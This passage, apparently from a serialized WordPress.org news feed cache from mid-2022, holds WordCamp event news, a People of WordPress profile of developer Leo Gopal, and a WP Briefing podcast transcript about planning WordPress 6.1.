class=\"wp-block-spacer\"></div>\n\n\n\n<h2>WordCamp Asia 2023 is Calling for Sponsors</h2>\n\n\n\n<ul><li>WordCamp Asia 2023, the first flagship WordCamp event in Asia, recently opened its <a href=\"https://asia.wordcamp.org/2023/call-for-sponsors/\">Call for Sponsors</a>.</li><li><a href=\"https://us.wordcamp.org/2022/\">WordCamp US 2022</a> is sold out. General Admission tickets went on sale on June 30, 2022, and were quickly claimed the same day. If you couldn’t get yours, the organizing team recommends <a href=\"https://us.wordcamp.org/2022/tickets/\">checking this page</a> periodically to see if any become available.</li><li>Curious about why WordCamp US is hosting fewer people this year? The WordCamp US team explained why in <a href=\"https://us.wordcamp.org/2022/wordcamp-us-2022-and-attendee-count/\">this post</a>.</li><li><a href=\"https://europe.wordcamp.org/2022/\">WordCamp Europe 2022</a> was successfully held in Porto, Portugal, from June 2 to 4, 2022. The event saw 2,300 in-person attendees and a record 800 participants at Contributor Day. All the sessions will be available <a href=\"https://wordpress.tv/event/wordcamp-europe-2022/\">on WordPress.tv soon</a>.</li><li>In 2023, WordCamp Europe will be hosted in the city of Athens, Greece. The <a href=\"https://europe.wordcamp.org/2023/call-for-organisers/\">Call for Organizers</a> is now open.</li><li>Josepha Haden covered some important questions from WordCamp Europe on a <a href=\"https://wordpress.org/news/2022/06/episode-33-some-important-questions-from-wceu/\">special episode of WP Briefing</a>. Be sure to give it a listen!</li></ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\"><p>The #WPDiversity group has organized a free, online speaker workshop for Indian women in the WordPress community. The event will take place on September 24-25, 2022. <a href=\"https://www.eventbrite.com/e/speaker-workshop-for-indian-women-in-the-wordpress-community-sept-24-25-tickets-348466712317\">Registration is now open</a>.</p></blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\" />\n\n\n\n<p><strong><em><strong><em>Have a story that we could include in the next issue of The Month in WordPress? Let us know by filling out </em></strong><a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\"><strong><em>this form</em></strong></a><strong><em>.</em></strong></em></strong></p>\n\n\n\n<p><em>The following folks contributed to this Month in WordPress: <a href=\'https://profiles.wordpress.org/mysweetcate/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>mysweetcate</a>, <a href=\'https://profiles.wordpress.org/dansoschin/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>dansoschin</a>, <a href=\'https://profiles.wordpress.org/lmurillom/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>lmurillom</a>, <a href=\'https://profiles.wordpress.org/webcommsat/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>webcommsat</a>, <a href=\'https://profiles.wordpress.org/chaion07/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>chaion07</a>, <a href=\'https://profiles.wordpress.org/rmartinezduque/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>rmartinezduque</a>.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13069\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:72:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"People of WordPress: Leo Gopal\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://wordpress.org/news/2022/06/people-of-wordpress-leo-gopal/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 30 Jun 2022 12:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:6:{i:0;a:5:{s:4:\"data\";s:9:\"Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Features\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:7:\"General\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:10:\"Interviews\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:9:\"HeroPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:19:\"People of WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13020\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:355:\"In this series, we share some of the inspiring stories of how WordPress and its global network of contributors can change people&#8217;s lives for the better. This month we feature Leo Gopal, from South Africa, a back-end Developer and Customer Support agent on the encouragement and learning support the WordPress community can give. Writing as [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Meher Bala\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:11765:\"\n<p>In this series, we share some of the inspiring stories of how WordPress and its global network of contributors can change people&#8217;s lives for the better. This month we feature Leo Gopal, from South Africa, a back-end Developer and Customer Support agent on the encouragement and learning support the WordPress community can give.</p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img decoding=\"async\" loading=\"lazy\" src=\"https://i0.wp.com/wordpress.org/news/files/2022/06/featured-img-for-leo2.jpg?resize=680%2C420&#038;ssl=1\" alt=\"Portrait of Leo Gopal in a black shirt with a blue sky behind.\" class=\"wp-image-13037\" width=\"680\" height=\"420\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2022/06/featured-img-for-leo2.jpg?w=1014&amp;ssl=1 1014w, https://i0.wp.com/wordpress.org/news/files/2022/06/featured-img-for-leo2.jpg?resize=300%2C186&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2022/06/featured-img-for-leo2.jpg?resize=768%2C475&amp;ssl=1 768w\" sizes=\"(max-width: 680px) 100vw, 680px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<h2>Writing as a channel of expression</h2>\n\n\n\n<p>Curiosity, writing, and resilience are recurring themes in Leo&#8217;s story, and have mapped with his WordPress journey.&nbsp;</p>\n\n\n\n<p>High school was a difficult time for Leo, as he had a speech impediment which only subsided when he was with close friends or family.</p>\n\n\n\n<p>He began writing a journal as an avenue of expression and found every word arrived smoothly for him. &nbsp;</p>\n\n\n\n<h2>It all began with WordPress 1.2 &#8216;Mingus&#8217;</h2>\n\n\n\n<p>In 2004, Leo discovered the joy of blogging as a way of combining keeping a journal with ‘conversations’ he could have with those who commented on his blogs. The potential and power of blogs would be an influence in the rest of his life.</p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" loading=\"lazy\" src=\"https://i1.wp.com/wordpress.org/news/files/2022/06/leo-gopal.jpeg?fit=720%2C960&amp;ssl=1\" alt=\"Leo sat in front of a pond. \" class=\"wp-image-13027\" width=\"720\" height=\"960\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2022/06/leo-gopal.jpeg?w=720&amp;ssl=1 720w, https://i1.wp.com/wordpress.org/news/files/2022/06/leo-gopal.jpeg?resize=225%2C300&amp;ssl=1 225w\" sizes=\"(max-width: 720px) 100vw, 720px\" /></figure>\n\n\n\n<p>As Leo&#8217;s confidence grew through expressing himself in writing, he was determined that his stutter would &#8216;no longer hold power over him&#8217;. In 2005, with the encouragement of his blog readers, he spent his school summer break in his room working on reducing his stutter. WordPress would be the tool that would enable him to connect with his blog readers and to express his creativity and thoughts.</p>\n\n\n\n<h2>Making WordPress your own</h2>\n\n\n\n<p>In high school, Leo had opted for programming as one of his subjects. In 2008, he built his first website using WordPress for the students at the school. This was the first time he saw the real value of WordPress and open source.</p>\n\n\n\n<p>During the following years, he increasingly spent time searching online for information on &#8216;Customising WordPress&#8217; and &#8216;Making WordPress your own&#8217;.</p>\n\n\n\n<p>Leo wanted to keep busy and as soon as he finished school, he applied for every entry-level web-related job that he could find. He was hired by a company for the role of webmaster for its Marketing team focused on WordPress.</p>\n\n\n\n<p>He continued to grow his skills as a WordPress developer with the help of useful documentation that he could find and through his helpful local WordPress Community. This helped him earn a living and support his family.</p>\n\n\n\n<h2>Helping yourself through helping others in the community</h2>\n\n\n\n<p>In 2015, Leo moved full-time to Cape Town, South Africa, and started as a developer at a web development agency, eventually progressing to its Head of Development and managing a small team.</p>\n\n\n\n<p>He chose WordPress as his main platform for development mainly because of the community behind it.</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>“<em>Had it not been for those searches on how to make WordPress your own, my life would have turned out a lot differently</em>.”&nbsp;</p><cite>Leo Gopal</cite></blockquote>\n\n\n\n<p>Leo felt he had a hurdle to overcome working in web sector. He didn’t feel like a ‘real developer’ being self-taught. However, through the community, he realized that there were many self-taught developers and he was not alone.&nbsp;&nbsp;</p>\n\n\n\n<p>Alongside his development path, Leo faced a mental health journey. He had suffered from depression and found the community to be accepting and understanding of this.&nbsp;</p>\n\n\n\n<p>At WordCamp Cape Town 2016, he stood in front of an audience and gave a talk: “<a href=\"https://wordpress.tv/2016/11/24/leo-gopal-the-wordpress-community-mental-wellness-and-you/\">The WordPress Community, Mental Wellness, and You</a>”. Following this talk, he was greeted by many attendees who thanked him for talking so openly about mental health issues.</p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https://i1.wp.com/wordpress.org/news/files/2022/06/Leo-speaking-2.jpeg?resize=1024%2C683&#038;ssl=1\" alt=\"Leo speaking at the podium at WordCamp Cape Town in 2016\" class=\"wp-image-13023\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2022/06/Leo-speaking-2.jpeg?w=1024&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2022/06/Leo-speaking-2.jpeg?resize=300%2C200&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2022/06/Leo-speaking-2.jpeg?resize=768%2C512&amp;ssl=1 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" data-recalc-dims=\"1\" /><figcaption class=\"wp-element-caption\"><em>Leo speaking at a WordCamp</em> Cape Town, 2016</figcaption></figure>\n\n\n\n<p>Leo has been diagnosed with bipolar, previously known as manic depression. In 2017, he hit a low period and struggled to keep going. He found support and understanding in the community in WordPress.</p>\n\n\n\n<p>He has openly written about his experiences with depression and started an initiative where topics of mental health and general wellbeing can be freely and non-judgmentally discussed.&nbsp;&nbsp;</p>\n\n\n\n<p>He said that by helping others, he is helping himself, every day.</p>\n\n\n\n<h2>Contributing to WordPress</h2>\n\n\n\n<p>Leo has contributed to the community as a Co-organizer in South Africa for the 2016 and 2017 WordCamp Cape Town, WordPress Meetup Cape Town 2015 &#8211; 2016, and WordPress Durban 2017 – 2020. He has also spoken at a number of WordCamps.</p>\n\n\n\n<p>Maintaining connections with people he had met through these events Leo felt was a great aid to his mental wellbeing during the Covid pandemic. </p>\n\n\n\n<p>He has contributed to core and plugins and believes that WordPress and its community make it extremely easy to contribute. </p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>“<em>The cost to start contributing is extremely low &#8211; start now</em>”.</p><cite>Leo Gopal</cite></blockquote>\n\n\n\n<p>When the ability to create and add patterns to the WordPress.org library came out in 2021, Leo used it almost immediately and created a <a href=\"https://wordpress.org/patterns/pattern/call-to-action-section-2/\">call-to-action box</a> which could be used by both his clients and the community. He plans to release a few more complex patterns.&nbsp;&nbsp;</p>\n\n\n\n<h2>Yes, we can.</h2>\n\n\n\n<p>Leo’s mantra is “I can do it!”</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https://i0.wp.com/wordpress.org/news/files/2022/06/Leo-speaking-3.jpeg?resize=1024%2C683&#038;ssl=1\" alt=\"Leo speaking at a WordCamp Cape Town in 2019\" class=\"wp-image-13032\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2022/06/Leo-speaking-3.jpeg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2022/06/Leo-speaking-3.jpeg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2022/06/Leo-speaking-3.jpeg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2022/06/Leo-speaking-3.jpeg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2022/06/Leo-speaking-3.jpeg?w=1944&amp;ssl=1 1944w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" data-recalc-dims=\"1\" /><figcaption class=\"wp-element-caption\"><em>Leo speaking at a WordCamp</em> Cape Town, 2019</figcaption></figure>\n\n\n\n<p>Getting over a stutter, overcoming poverty, being urgently self-taught, growing up in a country with “load shedding” electricity outages, and one of the slowest rated internet speeds in the developing world, and strengthening mental wellness are not easy feats., And yet, he knows he can do it.</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>“<em>Never, ever think you do not have the &#8216;right&#8217; circumstances for success. Just keep going, progress over perfection – <strong>you</strong> can do it</em>.”</p><cite>Leo Gopal</cite></blockquote>\n\n\n\n<p>As Leo puts it, the WordPress community doesn’t just power a percentage of the internet; it empowers too.</p>\n\n\n\n<h2>Share the stories</h2>\n\n\n\n<p>Help share these stories of open source contributors and continue to grow the community. Meet more WordPressers in the <a href=\"https://wordpress.org/news/category/newsletter/interviews/\">People of WordPress series</a>.</p>\n\n\n\n<h2>Contributors</h2>\n\n\n\n<p>Thanks to Nalini Thakor (<a href=\'https://profiles.wordpress.org/nalininonstopnewsuk/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>nalininonstopnewsuk</a>), Larissa Murillo (<a href=\'https://profiles.wordpress.org/lmurillom/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>lmurillom</a>), Meher Bala (<a href=\'https://profiles.wordpress.org/meher/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>meher</a>), Abha Thakor (<a href=\'https://profiles.wordpress.org/webcommsat/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>webcommsat</a>), Chloe Bringmann (<a href=\'https://profiles.wordpress.org/cbringmann/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>cbringmann</a>) for work on this feature, and to all the contributors who helped with specific areas and the series this last few months. Thank you too to Leo Gopal (<a href=\'https://profiles.wordpress.org/leogopal/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>leogopal</a>) for sharing his experiences.</p>\n\n\n\n<p>Thank you to Josepha Haden (<a href=\'https://profiles.wordpress.org/chanthaboune/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>chanthaboune</a>) and Topher DeRosia (<a href=\'https://profiles.wordpress.org/topher1kenobe/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>topher1kenobe</a>) for support of the People of WordPress series.</p>\n\n\n\n<div class=\"wp-block-media-text is-stacked-on-mobile is-vertically-aligned-center\" style=\"grid-template-columns:29% auto\"><figure class=\"wp-block-media-text__media\"><img decoding=\"async\" loading=\"lazy\" width=\"180\" height=\"135\" src=\"https://i1.wp.com/wordpress.org/news/files/2020/03/heropress_logo_180.png?resize=180%2C135&#038;ssl=1\" alt=\"HeroPress logo\" class=\"wp-image-8409 size-full\" data-recalc-dims=\"1\" /></figure><div class=\"wp-block-media-text__content\">\n<p class=\"has-small-font-size\"><em>This People of WordPress feature is inspired by an essay originally published on </em><a href=\"https://heropress.com/\"><em>HeroPress.com</em></a><em>, a community initiative created by Topher DeRosia. It highlights people in the WordPress community who have overcome barriers and whose stories might otherwise go unheard. </em>#HeroPress </p>\n</div></div>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13020\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:61:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"WP Briefing: Episode 34: WordPress 6.1 is Coming!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"https://wordpress.org/news/2022/06/episode-34-wordpress-6-1-is-coming/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 27 Jun 2022 15:13:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:7:\"Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=13013\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:154:\"Join WordPress Executive Director Josepha Haden Chomphosy as she covers planning for major releases and how you can get involved in the 6.1 release cycle!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2022/06/WP-Briefing-034.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Santana Inniss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:8675:\"\n<p>In the thirty-fourth episode of the WordPress Briefing, hear WordPress Executive Director Josepha Haden Chomphosy discuss planning for the major release and how you can get involved in the WordPress 6.1 release cycle! </p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2>Credits</h2>\n\n\n\n<ul><li>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a></li><li>Logo:&nbsp;<a href=\"https://profiles.wordpress.org/beafialho/\">Beatriz Fialho</a></li><li>Production:&nbsp;<a href=\"https://profiles.wordpress.org/santanainniss/\">Santana Inniss</a></li><li>Song: Fearless First by Kevin MacLeod</li></ul>\n\n\n\n<h2>References</h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/core/2022/06/23/wordpress-6-1-planning-roundup/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/core/2022/06/23/wordpress-6-1-planning-roundup/\">WordPress 6.1 Planning Roundup Core Post</a></li><li><a href=\"https://make.wordpress.org/core/tag/6-1/\">All WordPress 6.1 posts on Make Core</a></li><li><a href=\"https://www.eventbrite.com/e/speaker-workshop-for-indian-women-in-the-wordpress-community-sept-24-25-tickets-348466712317\">Speaker Workshop for Indian Women in the WordPress Community</a></li><li><a href=\"https://wordpress.org/photos/\" data-type=\"URL\" data-id=\"https://wordpress.org/photos/\">Submit photos to the WordPress Photo Directory</a></li></ul>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-13013\"></span>\n\n\n\n<p>[<strong>Josepha Haden Chomphosy </strong>00:00:10]&nbsp;&nbsp;</p>\n\n\n\n<p>Hello everyone. And welcome to the WordPress Briefing, the podcast where you can catch quick explanations of some of the ideas behind the WordPress open source project and the community around it, as well as get a small list of big things coming up in the next two weeks. I&#8217;m your host Josepha Haden Chomphosy.</p>\n\n\n\n<p>Here we go.</p>\n\n\n\n<p>All right my friends. So it&#8217;s been about a month since WordPress 6.0 came out and you know what that means. It means we are already looking at the next major WordPress release because,&nbsp; as most of you know, WordPress never sleeps. Y&#8217;all are honestly up and hustling like 24/7 as far as I can tell, which is great! And is one of the many benefits of being a global community, I suppose.&nbsp;</p>\n\n\n\n<p>[<strong>Josepha Haden Chomphosy </strong>00:01:05]</p>\n\n\n\n<p>But anyway, back to this major release. There was a high-level roadmap shared by Mattias Ventura at the start of June. And it lists some focus areas for the Block Editor, continued refinements to the template editor and navigation block, and some work on global styles and more / better blocks and design tools that are slated to ship with WordPress 6.1. From the WordPress core side, though, there are a couple hundred tickets that are milestoned for the next major.</p>\n\n\n\n<p>Being milestoned for a release means that either a ticket wasn&#8217;t ready for the last release and was moved to the next available one, or a ticket has become ready for a release since the last major release occurred. That list as it stands might be a little bit too big for a single release. However, honestly, no list is too big if we have enough folks contributing.<br></p>\n\n\n\n<p>So if you&#8217;ve never contributed to a major release of WordPress before, and you&#8217;re interested to know how that works, there are some things to keep an eye out for over the next few weeks. We are in what is considered the planning phase for the next big release. And so there are two or three things you&#8217;re gonna see pretty soon.</p>\n\n\n\n<p>[<strong>Josepha Haden Chomphosy </strong>00:02:11]&nbsp;</p>\n\n\n\n<p>First is a planning kickoff post. That post gets published on make.wordpress.org/core, and it includes notes on volunteering for the release squad, some guesses at areas of focus based on the tickets that we&#8217;re seeing in track, a schedule, the whole kit, and caboodle. It&#8217;s all in there. If you are wanting to know how to lend a hand and how to take your first steps to core contribution, apart from the new contributor meeting that happens before the dev chat, that post is the place to start.&nbsp;</p>\n\n\n\n<p>So keep an eye out on make.wordpress.org/core for that. And then the second thing that shows up in the planning phase for any major release is bug scrub and ticket triage meetings. Like I mentioned, there are the new contributor meetings where they scrub tickets and talk through the basics of what we&#8217;re seeing on good first bugs.</p>\n\n\n\n<p>And I mentioned that here often, I just mentioned it in the last, in the last bullet point, but there are also regular bug scrubs and ticket triaging sessions where a kind contributor chooses a set of tickets to review and then leads other contributors through the process of checking to see if a ticket is valid to see if it can be replicated to see if it has a patch.</p>\n\n\n\n<p>[<strong>Josepha Haden Chomphosy </strong>00:03:23]&nbsp;</p>\n\n\n\n<p>If there are decisions that are blocking it and how to move those decisions forward, and generally just kind of discuss what else has to be done in order to take the ticket to the next step. Those get announced in the dev chat every Wednesday, but also there is a post that will go up on make.wordpress.org/core.</p>\n\n\n\n<p>I wish I had a faster way to say that instead of just racing through the whole URL every time. But it&#8217;ll be okay. We&#8217;ll put it in the show notes in case you would rather just click some stuff. And the third thing to keep an eye out for. If development is not your thing, so writing code is not already part of your tool belt, that&#8217;s totally fine. There are many other important areas where you can contribute, too. Design, training, support, polyglots, marketing, documentation, and more. These teams all do work in and around a release that is vital to WordPress&#8217; overall success.&nbsp;</p>\n\n\n\n<p>[<strong>Josepha Haden Chomphosy </strong>00:04:19]&nbsp;</p>\n\n\n\n<p>And a final thought of all. If that felt a little too intense if you want to see where this ship is headed, but you can&#8217;t quite commit to grabbing an oar today, that&#8217;s fine, too. The most important thing is that if you are a member of the community, as an extender or a user or a die-hard contributor, or a new contributor, the most important thing is that you have some general awareness of what the overall direction is.&nbsp;</p>\n\n\n\n<p>You might do that by experimenting with blocks in your products or by testing screen readers against your workflow or even by setting aside an hour to participate in the latest testing prompt. Being aware of what&#8217;s happening in and around your area of the project will help to keep you kind of prepared and knowledgeable to lend a hand whenever it is that you are ready.</p>\n\n\n\n<p>[<strong>Josepha Haden Chomphosy </strong>00:05:14]&nbsp;</p>\n\n\n\n<p>And that then brings us to our small list of big things. My friends, registration is now open for the WordPress Speaker Workshop for Women Voices in India. That&#8217;s taking place on September 24th and 25th. Uh, it&#8217;s happening over Zoom, so location or travel shouldn&#8217;t really be an obstacle for you. I&#8217;m going to leave a link to some information about that in the show notes. It should be an excellent opportunity that [the] WP Diversity initiative that WordPress has, that the community team helps to foster, is really an excellent experience. And so I hope that you register and attend that.&nbsp;</p>\n\n\n\n<p>And the second thing actually is a bit of a celebration. The Photo Directory recently hit a huge milestone of 3000 photos! And you also can submit your photos to wordpress.org/photos. If you feel so inclined to make a contribution of that type.&nbsp;</p>\n\n\n\n<p>[<strong>Josepha Haden Chomphosy </strong>00:06:07]&nbsp;</p>\n\n\n\n<p>And then the third thing on my smallest of big things is actually kind of a, a WordPress tooltip a little bit of a WordPress project did-ya-know? So, there is a special channel in WordPress Slack for sharing thanks to folks who were especially helpful to you. It&#8217;s called the Props Channel. And when someone shares props with you, it even shows up in your activity on your wordpress.org profile. Pretty cool, huh? Props to the Meta team for that one.</p>\n\n\n\n<p>And that my friends is your small list of big things. Thank you for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy. And I&#8217;ll see you again in a couple of weeks.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13013\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:61:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"WP Briefing: Episode 33: Some Important Questions from 